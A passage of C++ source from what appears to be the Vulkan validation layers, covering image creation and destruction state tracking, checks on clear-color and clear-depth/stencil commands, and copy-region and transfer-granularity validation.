VUID skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUIDUndefined, "vkCreateImage(): If pCreateInfo->flags contains VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR, " "format must be block, ETC or ASTC compressed, but is %s", string_VkFormat(pCreateInfo->format)); } if (!(pCreateInfo->flags & VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT)) { // TODO: Add Maintenance2 VUID skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUIDUndefined, "vkCreateImage(): If pCreateInfo->flags contains VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR, " "flags must also contain VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT."); } } } if (pCreateInfo->sharingMode == VK_SHARING_MODE_CONCURRENT && pCreateInfo->pQueueFamilyIndices) { skip |= ValidateQueueFamilies(pCreateInfo->queueFamilyIndexCount, pCreateInfo->pQueueFamilyIndices, "vkCreateImage", "pCreateInfo->pQueueFamilyIndices", "VUID-VkImageCreateInfo-sharingMode-01420", "VUID-VkImageCreateInfo-sharingMode-01420", false); } return skip; } void CoreChecks::PostCallRecordCreateImage(VkDevice device, const VkImageCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImage *pImage, VkResult result) { if (VK_SUCCESS != result) return; IMAGE_LAYOUT_NODE image_state; image_state.layout = pCreateInfo->initialLayout; image_state.format = pCreateInfo->format; IMAGE_STATE *is_node = new IMAGE_STATE(*pImage, pCreateInfo); if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { RecordCreateImageANDROID(pCreateInfo, is_node); } GetImageMap()->insert(std::make_pair(*pImage, std::unique_ptr<IMAGE_STATE>(is_node))); ImageSubresourcePair subpair{*pImage, false, VkImageSubresource()}; (*GetImageSubresourceMap())[*pImage].push_back(subpair); (*GetImageLayoutMap())[subpair] = image_state; (*GetImageLayoutMap())[subpair] = image_state; } bool CoreChecks::PreCallValidateDestroyImage(VkDevice device, VkImage image, const 
VkAllocationCallbacks *pAllocator) {
    IMAGE_STATE *image_state = GetImageState(image);
    const VK_OBJECT obj_struct = {HandleToUint64(image), kVulkanObjectTypeImage};
    bool skip = false;
    if (image_state) {
        skip |= ValidateObjectNotInUse(image_state, obj_struct, "vkDestroyImage", "VUID-vkDestroyImage-image-01000");
    }
    return skip;
}

// Tears down all tracking state for an image at destroy time: invalidates command buffers that
// reference it, then clears memory bindings/ranges, QFO release barriers, and layout/subresource maps.
void CoreChecks::PreCallRecordDestroyImage(VkDevice device, VkImage image, const VkAllocationCallbacks *pAllocator) {
    if (!image) return;
    IMAGE_STATE *image_state = GetImageState(image);
    VK_OBJECT obj_struct = {HandleToUint64(image), kVulkanObjectTypeImage};
    // Any command buffer that recorded a binding to this image is no longer valid to submit
    InvalidateCommandBuffers(image_state->cb_bindings, obj_struct);
    // Clean up memory mapping, bindings and range references for image
    for (auto mem_binding : image_state->GetBoundMemory()) {
        auto mem_info = GetMemObjInfo(mem_binding);
        if (mem_info) {
            RemoveImageMemoryRange(obj_struct.handle, mem_info);
        }
    }
    ClearMemoryObjectBindings(obj_struct.handle, kVulkanObjectTypeImage);
    EraseQFOReleaseBarriers<VkImageMemoryBarrier>(image);
    // Remove image from imageMap
    GetImageMap()->erase(image);
    std::unordered_map<VkImage, std::vector<ImageSubresourcePair>> *imageSubresourceMap = GetImageSubresourceMap();
    const auto &sub_entry = imageSubresourceMap->find(image);
    if (sub_entry != imageSubresourceMap->end()) {
        // Drop every per-subresource layout entry before erasing the subresource list itself
        for (const auto &pair : sub_entry->second) {
            GetImageLayoutMap()->erase(pair);
        }
        imageSubresourceMap->erase(sub_entry);
    }
}

// Validates clear-color-specific image properties for vkCmdClearColorImage:
// aspect mask must be COLOR only, format must not be depth/stencil or compressed,
// and the image must have been created with TRANSFER_DST usage.
bool CoreChecks::ValidateImageAttributes(IMAGE_STATE *image_state, VkImageSubresourceRange range) {
    bool skip = false;

    if (range.aspectMask != VK_IMAGE_ASPECT_COLOR_BIT) {
        char const str[] = "vkCmdClearColorImage aspectMasks for all subresource ranges must be set to VK_IMAGE_ASPECT_COLOR_BIT";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                        HandleToUint64(image_state->image), kVUID_Core_DrawState_InvalidImageAspect, str);
    }

    if (FormatIsDepthOrStencil(image_state->createInfo.format)) {
        char const str[] = "vkCmdClearColorImage called with depth/stencil image.";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                        HandleToUint64(image_state->image), "VUID-vkCmdClearColorImage-image-00007", "%s.", str);
    } else if (FormatIsCompressed(image_state->createInfo.format)) {
        char const str[] = "vkCmdClearColorImage called with compressed image.";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                        HandleToUint64(image_state->image), "VUID-vkCmdClearColorImage-image-00007", "%s.", str);
    }

    if (!(image_state->createInfo.usage & VK_IMAGE_USAGE_TRANSFER_DST_BIT)) {
        char const str[] = "vkCmdClearColorImage called with image created without VK_IMAGE_USAGE_TRANSFER_DST_BIT.";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                        HandleToUint64(image_state->image), "VUID-vkCmdClearColorImage-image-00002", "%s.", str);
    }
    return skip;
}

uint32_t ResolveRemainingLevels(const VkImageSubresourceRange *range, uint32_t mip_levels) {
    // Return correct number of mip levels taking into account VK_REMAINING_MIP_LEVELS
    uint32_t mip_level_count = range->levelCount;
    if (range->levelCount == VK_REMAINING_MIP_LEVELS) {
        mip_level_count = mip_levels - range->baseMipLevel;
    }
    return mip_level_count;
}

uint32_t ResolveRemainingLayers(const VkImageSubresourceRange *range, uint32_t layers) {
    // Return correct number of layers taking into account VK_REMAINING_ARRAY_LAYERS
    uint32_t array_layer_count = range->layerCount;
    if (range->layerCount == VK_REMAINING_ARRAY_LAYERS) {
        array_layer_count = layers - range->baseArrayLayer;
    }
    return array_layer_count;
}

// Validates the destination layout given to a clear command (must be TRANSFER_DST_OPTIMAL,
// GENERAL, or SHARED_PRESENT_KHR with the extension enabled), then cross-checks each affected
// subresource against any layout already recorded for it in this command buffer.
// func_name selects between the color and depth/stencil VUIDs.
bool CoreChecks::VerifyClearImageLayout(GLOBAL_CB_NODE *cb_node, IMAGE_STATE *image_state, VkImageSubresourceRange range,
                                        VkImageLayout dest_image_layout, const char *func_name) {
    bool skip = false;

    // Expand VK_REMAINING_* before iterating subresources
    uint32_t level_count = ResolveRemainingLevels(&range, image_state->createInfo.mipLevels);
    uint32_t layer_count = ResolveRemainingLayers(&range, image_state->createInfo.arrayLayers);

    if (dest_image_layout != VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL) {
        if (dest_image_layout == VK_IMAGE_LAYOUT_GENERAL) {
            if (image_state->createInfo.tiling != VK_IMAGE_TILING_LINEAR) {
                // LAYOUT_GENERAL is allowed, but may not be performance optimal, flag as perf warning.
                skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), kVUID_Core_DrawState_InvalidImageLayout,
                                "%s: Layout for cleared image should be TRANSFER_DST_OPTIMAL instead of GENERAL.", func_name);
            }
        } else if (VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR == dest_image_layout) {
            if (!GetDeviceExtensions()->vk_khr_shared_presentable_image) {
                // TODO: Add unique error id when available.
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), 0,
                                "Must enable VK_KHR_shared_presentable_image extension before creating images with a layout type "
                                "of VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR.");
            } else {
                if (image_state->shared_presentable) {
                    skip |= log_msg(
                        report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                        HandleToUint64(image_state->image), 0,
                        "Layout for shared presentable cleared image is %s but can only be VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR.",
                        string_VkImageLayout(dest_image_layout));
                }
            }
        } else {
            // Any other layout is an error; pick the VUID that matches the calling command
            const char *error_code = "VUID-vkCmdClearColorImage-imageLayout-00005";
            if (strcmp(func_name, "vkCmdClearDepthStencilImage()") == 0) {
                error_code = "VUID-vkCmdClearDepthStencilImage-imageLayout-00012";
            } else {
                assert(strcmp(func_name, "vkCmdClearColorImage()") == 0);
            }
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image_state->image), error_code,
                            "%s: Layout for cleared image is %s but can only be TRANSFER_DST_OPTIMAL or GENERAL.", func_name,
                            string_VkImageLayout(dest_image_layout));
        }
    }

    // Per-subresource check: a layout already tracked in this command buffer must match the clear layout
    for (uint32_t level_index = 0; level_index < level_count; ++level_index) {
        uint32_t level = level_index + range.baseMipLevel;
        for (uint32_t layer_index = 0; layer_index < layer_count; ++layer_index) {
            uint32_t layer = layer_index + range.baseArrayLayer;
            VkImageSubresource sub = {range.aspectMask, level, layer};
            IMAGE_CMD_BUF_LAYOUT_NODE node;
            if (FindCmdBufLayout(cb_node, image_state->image, sub, node)) {
                if (node.layout != dest_image_layout) {
                    const char *error_code = "VUID-vkCmdClearColorImage-imageLayout-00004";
                    if (strcmp(func_name, "vkCmdClearDepthStencilImage()") == 0) {
                        error_code = "VUID-vkCmdClearDepthStencilImage-imageLayout-00011";
                    } else {
                        assert(strcmp(func_name, "vkCmdClearColorImage()") == 0);
                    }
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, 0,
                                    error_code,
                                    "%s: Cannot clear an image whose layout is %s and doesn't match the current layout %s.",
                                    func_name, string_VkImageLayout(dest_image_layout), string_VkImageLayout(node.layout));
                }
            }
        }
    }

    return skip;
}

// State update for a clear command: seeds the tracked layout of every subresource in 'range'
// that this command buffer has not already recorded a layout for.
void CoreChecks::RecordClearImageLayout(GLOBAL_CB_NODE *cb_node, VkImage image, VkImageSubresourceRange range,
                                        VkImageLayout dest_image_layout) {
    VkImageCreateInfo *image_create_info = &(GetImageState(image)->createInfo);
    uint32_t level_count = ResolveRemainingLevels(&range, image_create_info->mipLevels);
    uint32_t layer_count = ResolveRemainingLayers(&range, image_create_info->arrayLayers);

    for (uint32_t level_index = 0; level_index < level_count; ++level_index) {
        uint32_t level = level_index + range.baseMipLevel;
        for (uint32_t layer_index = 0; layer_index < layer_count; ++layer_index) {
            uint32_t layer = layer_index + range.baseArrayLayer;
            VkImageSubresource sub = {range.aspectMask, level, layer};
            IMAGE_CMD_BUF_LAYOUT_NODE node;
            if (!FindCmdBufLayout(cb_node, image, sub, node)) {
                // Not tracked yet: record the clear layout as both the initial and current layout
                SetLayout(cb_node, image, sub, IMAGE_CMD_BUF_LAYOUT_NODE(dest_image_layout, dest_image_layout));
            }
        }
    }
}

bool CoreChecks::PreCallValidateCmdClearColorImage(VkCommandBuffer commandBuffer, VkImage
image, VkImageLayout imageLayout,
                                                   const VkClearColorValue *pColor, uint32_t rangeCount,
                                                   const VkImageSubresourceRange *pRanges) {
    bool skip = false;
    // TODO : Verify memory is in VK_IMAGE_STATE_CLEAR state
    auto cb_node = GetCBNode(commandBuffer);
    auto image_state = GetImageState(image);
    if (cb_node && image_state) {
        skip |= ValidateMemoryIsBoundToImage(image_state, "vkCmdClearColorImage()", "VUID-vkCmdClearColorImage-image-00003");
        skip |= ValidateCmdQueueFlags(cb_node, "vkCmdClearColorImage()", VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT,
                                      "VUID-vkCmdClearColorImage-commandBuffer-cmdpool");
        skip |= ValidateCmd(cb_node, CMD_CLEARCOLORIMAGE, "vkCmdClearColorImage()");
        // TRANSFER_DST format-feature requirement only exists with 1.1 or VK_KHR_maintenance1
        if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) {
            skip |= ValidateImageFormatFeatureFlags(image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdClearColorImage",
                                                    "VUID-vkCmdClearColorImage-image-01993",
                                                    "VUID-vkCmdClearColorImage-image-01993");
        }
        skip |= InsideRenderPass(cb_node, "vkCmdClearColorImage()", "VUID-vkCmdClearColorImage-renderpass");
        for (uint32_t i = 0; i < rangeCount; ++i) {
            std::string param_name = "pRanges[" + std::to_string(i) + "]";
            skip |= ValidateCmdClearColorSubresourceRange(image_state, pRanges[i], param_name.c_str());
            skip |= ValidateImageAttributes(image_state, pRanges[i]);
            skip |= VerifyClearImageLayout(cb_node, image_state, pRanges[i], imageLayout, "vkCmdClearColorImage()");
        }
    }
    return skip;
}

// State update for vkCmdClearColorImage: bind the image to the command buffer and
// record the clear layout for each untracked subresource in every range.
void CoreChecks::PreCallRecordCmdClearColorImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout,
                                                 const VkClearColorValue *pColor, uint32_t rangeCount,
                                                 const VkImageSubresourceRange *pRanges) {
    auto cb_node = GetCBNode(commandBuffer);
    auto image_state = GetImageState(image);
    if (cb_node && image_state) {
        AddCommandBufferBindingImage(cb_node, image_state);
        for (uint32_t i = 0; i < rangeCount; ++i) {
            RecordClearImageLayout(cb_node, image, pRanges[i], imageLayout);
        }
    }
}

// Validation for vkCmdClearDepthStencilImage: memory binding, queue family, command state,
// render-pass restriction, per-range subresource/layout checks, aspect mask (depth/stencil only),
// format class, and TRANSFER_DST usage.
bool CoreChecks::PreCallValidateCmdClearDepthStencilImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout,
                                                          const VkClearDepthStencilValue *pDepthStencil, uint32_t rangeCount,
                                                          const VkImageSubresourceRange *pRanges) {
    bool skip = false;
    // TODO : Verify memory is in VK_IMAGE_STATE_CLEAR state
    auto cb_node = GetCBNode(commandBuffer);
    auto image_state = GetImageState(image);
    if (cb_node && image_state) {
        skip |= ValidateMemoryIsBoundToImage(image_state, "vkCmdClearDepthStencilImage()",
                                             "VUID-vkCmdClearDepthStencilImage-image-00010");
        skip |= ValidateCmdQueueFlags(cb_node, "vkCmdClearDepthStencilImage()", VK_QUEUE_GRAPHICS_BIT,
                                      "VUID-vkCmdClearDepthStencilImage-commandBuffer-cmdpool");
        skip |= ValidateCmd(cb_node, CMD_CLEARDEPTHSTENCILIMAGE, "vkCmdClearDepthStencilImage()");
        // TRANSFER_DST format-feature requirement only exists with 1.1 or VK_KHR_maintenance1
        if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) {
            skip |= ValidateImageFormatFeatureFlags(image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdClearDepthStencilImage",
                                                    "VUID-vkCmdClearDepthStencilImage-image-01994",
                                                    "VUID-vkCmdClearDepthStencilImage-image-01994");
        }
        skip |= InsideRenderPass(cb_node, "vkCmdClearDepthStencilImage()", "VUID-vkCmdClearDepthStencilImage-renderpass");
        for (uint32_t i = 0; i < rangeCount; ++i) {
            std::string param_name = "pRanges[" + std::to_string(i) + "]";
            skip |= ValidateCmdClearDepthSubresourceRange(image_state, pRanges[i], param_name.c_str());
            skip |= VerifyClearImageLayout(cb_node, image_state, pRanges[i], imageLayout, "vkCmdClearDepthStencilImage()");
            // Image aspect must be depth or stencil or both
            VkImageAspectFlags valid_aspects = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT;
            if (((pRanges[i].aspectMask & valid_aspects) == 0) || ((pRanges[i].aspectMask & ~valid_aspects) != 0)) {
                char const str[] =
                    "vkCmdClearDepthStencilImage aspectMasks for all subresource ranges must be set to VK_IMAGE_ASPECT_DEPTH_BIT "
                    "and/or VK_IMAGE_ASPECT_STENCIL_BIT";
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                HandleToUint64(commandBuffer), kVUID_Core_DrawState_InvalidImageAspect, str);
            }
        }
        if (image_state && !FormatIsDepthOrStencil(image_state->createInfo.format)) {
            char const str[] = "vkCmdClearDepthStencilImage called without a depth/stencil image.";
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image), "VUID-vkCmdClearDepthStencilImage-image-00014", "%s.", str);
        }
        if (VK_IMAGE_USAGE_TRANSFER_DST_BIT != (VK_IMAGE_USAGE_TRANSFER_DST_BIT & image_state->createInfo.usage)) {
            char const str[] =
                "vkCmdClearDepthStencilImage() called with an image that was not created with the VK_IMAGE_USAGE_TRANSFER_DST_BIT "
                "set.";
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image), "VUID-vkCmdClearDepthStencilImage-image-00009", "%s.", str);
        }
    }
    return skip;
}

// State update for vkCmdClearDepthStencilImage: bind the image to the command buffer and
// record the clear layout for each untracked subresource in every range.
void CoreChecks::PreCallRecordCmdClearDepthStencilImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout,
                                                        const VkClearDepthStencilValue *pDepthStencil, uint32_t rangeCount,
                                                        const VkImageSubresourceRange *pRanges) {
    auto cb_node = GetCBNode(commandBuffer);
    auto image_state = GetImageState(image);
    if (cb_node && image_state) {
        AddCommandBufferBindingImage(cb_node, image_state);
        for (uint32_t i = 0; i < rangeCount; ++i) {
            RecordClearImageLayout(cb_node, image, pRanges[i], imageLayout);
        }
    }
}

// Returns true if [x, xoffset] and [y, yoffset] overlap
static bool RangesIntersect(int32_t start, uint32_t start_offset, int32_t end, uint32_t end_offset) {
    bool result = false;
    // Intersection is non-empty iff max(starts) < min(ends)
    uint32_t intersection_min = std::max(static_cast<uint32_t>(start), static_cast<uint32_t>(end));
    uint32_t intersection_max = std::min(static_cast<uint32_t>(start) + start_offset, static_cast<uint32_t>(end) + end_offset);
    if (intersection_max > intersection_min) {
        result = true;
    }
    return result;
}

// Returns true if source area of first
copy region intersects dest area of second region
// It is assumed that these are copy regions within a single image (otherwise no possibility of collision)
static bool RegionIntersects(const VkImageCopy *rgn0, const VkImageCopy *rgn1, VkImageType type, bool is_multiplane) {
    bool result = false;

    // Separate planes within a multiplane image cannot intersect
    if (is_multiplane && (rgn0->srcSubresource.aspectMask != rgn1->dstSubresource.aspectMask)) {
        return result;
    }

    if ((rgn0->srcSubresource.mipLevel == rgn1->dstSubresource.mipLevel) &&
        (RangesIntersect(rgn0->srcSubresource.baseArrayLayer, rgn0->srcSubresource.layerCount, rgn1->dstSubresource.baseArrayLayer,
                         rgn1->dstSubresource.layerCount))) {
        result = true;
        // Intentional fall-through: each image type checks its own axis plus all lower-dimension axes
        switch (type) {
            case VK_IMAGE_TYPE_3D:
                result &= RangesIntersect(rgn0->srcOffset.z, rgn0->extent.depth, rgn1->dstOffset.z, rgn1->extent.depth);
                // fall through
            case VK_IMAGE_TYPE_2D:
                result &= RangesIntersect(rgn0->srcOffset.y, rgn0->extent.height, rgn1->dstOffset.y, rgn1->extent.height);
                // fall through
            case VK_IMAGE_TYPE_1D:
                result &= RangesIntersect(rgn0->srcOffset.x, rgn0->extent.width, rgn1->dstOffset.x, rgn1->extent.width);
                break;
            default:
                // Unrecognized or new IMAGE_TYPE enums will be caught in parameter_validation
                assert(false);
        }
    }
    return result;
}

// Returns non-zero if offset and extent exceed image extents
// Result is a bitmask of the axes that are out of bounds (x_bit/y_bit/z_bit).
static const uint32_t x_bit = 1;
static const uint32_t y_bit = 2;
static const uint32_t z_bit = 4;
static uint32_t ExceedsBounds(const VkOffset3D *offset, const VkExtent3D *extent, const VkExtent3D *image_extent) {
    uint32_t result = 0;
    // Extents/depths cannot be negative but checks left in for clarity
    if ((offset->z + extent->depth > image_extent->depth) || (offset->z < 0) ||
        ((offset->z + static_cast<int32_t>(extent->depth)) < 0)) {
        result |= z_bit;
    }
    if ((offset->y + extent->height > image_extent->height) || (offset->y < 0) ||
        ((offset->y + static_cast<int32_t>(extent->height)) < 0)) {
        result |= y_bit;
    }
    if ((offset->x + extent->width > image_extent->width) || (offset->x < 0) ||
        ((offset->x + static_cast<int32_t>(extent->width)) < 0)) {
        result |= x_bit;
    }
    return result;
}

// Test if two VkExtent3D structs are equivalent
static inline bool IsExtentEqual(const VkExtent3D *extent, const VkExtent3D *other_extent) {
    bool result = true;
    if ((extent->width != other_extent->width) || (extent->height != other_extent->height) ||
        (extent->depth != other_extent->depth)) {
        result = false;
    }
    return result;
}

// For image copies between compressed/uncompressed formats, the extent is provided in source image texels
// Destination image texel extents must be adjusted by block size for the dest validation checks
VkExtent3D GetAdjustedDestImageExtent(VkFormat src_format, VkFormat dst_format, VkExtent3D extent) {
    VkExtent3D adjusted_extent = extent;
    if ((FormatIsCompressed(src_format) && (!FormatIsCompressed(dst_format)))) {
        // Compressed source -> uncompressed dest: one dest texel per source block
        VkExtent3D block_size = FormatTexelBlockExtent(src_format);
        adjusted_extent.width /= block_size.width;
        adjusted_extent.height /= block_size.height;
        adjusted_extent.depth /= block_size.depth;
    } else if ((!FormatIsCompressed(src_format) && (FormatIsCompressed(dst_format)))) {
        // Uncompressed source -> compressed dest: one dest block per source texel
        VkExtent3D block_size = FormatTexelBlockExtent(dst_format);
        adjusted_extent.width *= block_size.width;
        adjusted_extent.height *= block_size.height;
        adjusted_extent.depth *= block_size.depth;
    }
    return adjusted_extent;
}

// Returns the effective extent of an image subresource, adjusted for mip level and array depth.
static inline VkExtent3D GetImageSubresourceExtent(const IMAGE_STATE *img, const VkImageSubresourceLayers *subresource) {
    const uint32_t mip = subresource->mipLevel;

    // Return zero extent if mip level doesn't exist
    if (mip >= img->createInfo.mipLevels) {
        return VkExtent3D{0, 0, 0};
    }

    // Don't allow mip adjustment to create 0 dim, but pass along a 0 if that's what subresource specified
    VkExtent3D extent = img->createInfo.extent;

    // If multi-plane, adjust per-plane extent
    if (FormatIsMultiplane(img->createInfo.format)) {
        VkExtent2D divisors = FindMultiplaneExtentDivisors(img->createInfo.format, subresource->aspectMask);
        extent.width /= divisors.width;
        extent.height /= divisors.height;
    }

    if (img->createInfo.flags & VK_IMAGE_CREATE_CORNER_SAMPLED_BIT_NV) {
        // Corner-sampled images have a minimum mip dimension of 2
        extent.width = (0 == extent.width ? 0 : std::max(2U, 1 + ((extent.width - 1) >> mip)));
        extent.height = (0 == extent.height ? 0 : std::max(2U, 1 + ((extent.height - 1) >> mip)));
        extent.depth = (0 == extent.depth ? 0 : std::max(2U, 1 + ((extent.depth - 1) >> mip)));
    } else {
        extent.width = (0 == extent.width ? 0 : std::max(1U, extent.width >> mip));
        extent.height = (0 == extent.height ? 0 : std::max(1U, extent.height >> mip));
        extent.depth = (0 == extent.depth ? 0 : std::max(1U, extent.depth >> mip));
    }

    // Image arrays have an effective z extent that isn't diminished by mip level
    if (VK_IMAGE_TYPE_3D != img->createInfo.imageType) {
        extent.depth = img->createInfo.arrayLayers;
    }

    return extent;
}

// Test if the extent argument has all dimensions set to 0.
static inline bool IsExtentAllZeroes(const VkExtent3D *extent) {
    return ((extent->width == 0) && (extent->height == 0) && (extent->depth == 0));
}

// Test if the extent argument has any dimensions set to 0.
static inline bool IsExtentSizeZero(const VkExtent3D *extent) {
    return ((extent->width == 0) || (extent->height == 0) || (extent->depth == 0));
}

// Returns the image transfer granularity for a specific image scaled by compressed block size if necessary.
VkExtent3D CoreChecks::GetScaledItg(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img) {
    // Default to (0, 0, 0) granularity in case we can't find the real granularity for the physical device.
    VkExtent3D granularity = {0, 0, 0};
    auto pPool = GetCommandPoolNode(cb_node->createInfo.commandPool);
    if (pPool) {
        granularity = GetPhysicalDeviceState()->queue_family_properties[pPool->queueFamilyIndex].minImageTransferGranularity;
        if (FormatIsCompressed(img->createInfo.format)) {
            // Granularity is expressed in compressed blocks for block-compressed formats
            auto block_size = FormatTexelBlockExtent(img->createInfo.format);
            granularity.width *= block_size.width;
            granularity.height *= block_size.height;
        }
    }
    return granularity;
}

// Test elements of a VkExtent3D structure against alignment constraints contained in another VkExtent3D structure
static inline bool IsExtentAligned(const VkExtent3D *extent, const VkExtent3D *granularity) {
    bool valid = true;
    if ((SafeModulo(extent->depth, granularity->depth) != 0) || (SafeModulo(extent->width, granularity->width) != 0) ||
        (SafeModulo(extent->height, granularity->height) != 0)) {
        valid = false;
    }
    return valid;
}

// Check elements of a VkOffset3D structure against a queue family's Image Transfer Granularity values
bool CoreChecks::CheckItgOffset(const GLOBAL_CB_NODE *cb_node, const VkOffset3D *offset, const VkExtent3D *granularity,
                                const uint32_t i, const char *function, const char *member, const char *vuid) {
    bool skip = false;
    VkExtent3D offset_extent = {};
    offset_extent.width = static_cast<uint32_t>(abs(offset->x));
    offset_extent.height = static_cast<uint32_t>(abs(offset->y));
    offset_extent.depth = static_cast<uint32_t>(abs(offset->z));
    if (IsExtentAllZeroes(granularity)) {
        // If the queue family image transfer granularity is (0, 0, 0), then the offset must always be (0, 0, 0)
        if (IsExtentAllZeroes(&offset_extent) == false) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(cb_node->commandBuffer), vuid,
                            "%s: pRegion[%d].%s (x=%d, y=%d, z=%d) must be (x=0, y=0, z=0) when the command buffer's queue family "
                            "image transfer granularity is (w=0, h=0, d=0).",
                            function, i, member, offset->x, offset->y, offset->z);
        }
    } else {
        // If the queue family image transfer granularity is not (0, 0, 0), then the offset dimensions must always be even
        // integer multiples of the image transfer granularity.
        if (IsExtentAligned(&offset_extent, granularity) == false) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(cb_node->commandBuffer), vuid,
                            "%s: pRegion[%d].%s (x=%d, y=%d, z=%d) dimensions must be even integer multiples of this command "
                            "buffer's queue family image transfer granularity (w=%d, h=%d, d=%d).",
                            function, i, member, offset->x, offset->y, offset->z, granularity->width, granularity->height,
                            granularity->depth);
        }
    }
    return skip;
}

// Check elements of a VkExtent3D structure against a queue family's Image Transfer Granularity values
bool CoreChecks::CheckItgExtent(const GLOBAL_CB_NODE *cb_node, const VkExtent3D *extent, const VkOffset3D *offset,
                                const VkExtent3D *granularity, const VkExtent3D *subresource_extent, const VkImageType image_type,
                                const uint32_t i, const char *function, const char *member, const char *vuid) {
    bool skip = false;
    if (IsExtentAllZeroes(granularity)) {
        // If the queue family image transfer granularity is (0, 0, 0), then the extent must always match the image
        // subresource extent.
        if (IsExtentEqual(extent, subresource_extent) == false) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(cb_node->commandBuffer), vuid,
                            "%s: pRegion[%d].%s (w=%d, h=%d, d=%d) must match the image subresource extents (w=%d, h=%d, d=%d) "
                            "when the command buffer's queue family image transfer granularity is (w=0, h=0, d=0).",
                            function, i, member, extent->width, extent->height, extent->depth, subresource_extent->width,
                            subresource_extent->height, subresource_extent->depth);
        }
    } else {
        // If the queue family image transfer granularity is not (0, 0, 0), then the extent dimensions must always be even
        // integer multiples of the image transfer granularity or the offset + extent dimensions must always match the image
        // subresource extent dimensions.
        VkExtent3D offset_extent_sum = {};
        offset_extent_sum.width = static_cast<uint32_t>(abs(offset->x)) + extent->width;
        offset_extent_sum.height = static_cast<uint32_t>(abs(offset->y)) + extent->height;
        offset_extent_sum.depth = static_cast<uint32_t>(abs(offset->z)) + extent->depth;
        bool x_ok = true;
        bool y_ok = true;
        bool z_ok = true;
        // Intentional fall-through: each image type checks its own axis plus all lower-dimension axes
        switch (image_type) {
            case VK_IMAGE_TYPE_3D:
                z_ok = ((0 == SafeModulo(extent->depth, granularity->depth)) ||
                        (subresource_extent->depth == offset_extent_sum.depth));
                // fall through
            case VK_IMAGE_TYPE_2D:
                y_ok = ((0 == SafeModulo(extent->height, granularity->height)) ||
                        (subresource_extent->height == offset_extent_sum.height));
                // fall through
            case VK_IMAGE_TYPE_1D:
                x_ok = ((0 == SafeModulo(extent->width, granularity->width)) ||
                        (subresource_extent->width == offset_extent_sum.width));
                break;
            default:
                // Unrecognized or new IMAGE_TYPE enums will be caught in parameter_validation
                assert(false);
        }
        if (!(x_ok && y_ok && z_ok)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(cb_node->commandBuffer), vuid,
